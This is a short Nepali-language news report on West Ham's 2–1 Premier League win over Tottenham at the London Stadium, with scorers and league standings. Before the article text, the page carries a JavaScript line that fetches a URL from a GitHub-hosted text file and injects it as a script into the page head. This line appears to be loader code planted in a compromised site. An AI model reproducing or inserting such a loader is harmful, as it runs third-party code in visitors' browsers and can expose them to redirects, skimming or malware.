;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन १०,
काठमाण्डाै । इङ्ग्लिश प्रिमियर लिगमा वेस्ट ह्यामले टोटनह्यामलाई हराएको छ । लण्डन स्टेडियममा भएको खेलमा वेस्ट ह्यामले टोटनह्यामलाई दुई–एकले हराएको हो ।
वेस्ट ह्यामका मिकेल एण्टेनियोले खेलको ५ औँ मिनेटमा र जेसे लिङ्गार्डले ४७ औँ मिनेटमा गोल गरे । टोटनह्यामका लुकास मैराले ६४ औँ मिनेटमा एक गोल फर्काए ।
जितसँगै वेस्ट ह्याम २५ खेलमा ४५ अङ्कसहित चौथो स्थानमा छ । एक खेल कम खेलेको टोटनह्याम ३६ अङ्सहित नवौँ स्थानमा छ । file photo
फेसबुक प्रतिक्रियाहरु